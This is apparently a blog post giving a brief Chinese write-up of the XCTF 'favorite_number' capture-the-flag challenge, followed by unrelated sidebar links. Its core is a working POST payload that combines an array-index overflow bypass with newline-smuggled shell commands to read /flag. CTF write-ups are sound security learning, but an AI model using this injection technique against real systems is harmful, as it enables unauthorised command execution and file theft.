当前位置:网站首页>攻防世界-favorite_number
攻防世界-favorite_number
2022-08-02 17:13:00 【NCNIPC梅苑】
favorite_number
首先泄露了php的版本
同其他师傅的payload不同的是
我的post数据中多了个分号;
最后是通过写文件打印文件的形式拿到的flag
stuff[4294967296]=admin&stuff[1]=user&num=123%0Aprintf /fla > /tmp/hello %26%26 printf g >> /tmp/hello %26%26 tac `tac /tmp/hello`;
边栏推荐
- golang源码分析(2):Golang context 包
- 小程序毕设作品之微信体育馆预约小程序毕业设计成品(8)毕业设计论文模板
- “蔚来杯“2022牛客暑期多校训练营4 E - Jobs (Hard Version)
- executeScript异步执行的时候没有返回值的原因
- Gartner发布,年度Challenger!
- MySQL——慢查询日志分析
- 持续集成(五)Jenkins配置父子job
- 字节面试官狂问我:你没有高并发、性能调优经验,为什么录取你?
- Nacos的基本配置
- The days of patching are more difficult than the days of writing code
猜你喜欢
mui中使用多级选择器实现省市区联动
Red and blue against experience sharing: CS from kill posture
Wechat Gymnasium Appointment Mini Program Graduation Design Finished Work (5) Task Book
如何生成随机数+原理详细分析
Nacos环境隔离
实时数仓架构演进及选型
NAACL 2022 | 具有元重加权的鲁棒自增强命名实体识别技术
融云「 IM 进阶实战高手课」系列直播上线
Real-time data warehouse architecture evolution and selection
土巴兔IPO五次折戟,互联网家装未解“中介”之痛
随机推荐
谁抢走了华大基因的生意?
ES: WeakSet
golang源码阅读(11)GO中各个目录的功能
安全至上:落地DevSecOps最佳实践你不得不知道的工具
SQL 正则解析手机号码提供商
When Oracle analyzes the archive log content, it finds many nulls?
[C Language Brush Questions] Three Questions for Getting Started with Pointers | String Length, String Copy, Two Number Swap
Nacos配置中心工作原理(超简单)
Navicat for mysql cracked versions installed
Kubernetes:(六)Pod重启策略和状态解释
vulnhub W34kn3ss: 1
动力电池扩产潮,宁德时代遭围剿
npm install 时,卡住不动,五种解决方法
What is the difference between erp system and wms system
Red and blue against experience sharing: CS from kill posture
蔚来杯2022牛客暑期多校训练营5 ABCDFGHK
Flink SQL builds real-time data warehouse DWD layer
Inconsistency between oracle and mysql statement results
navicat premium 15 下载安装详细教程
MYSQL下载及安装完整教程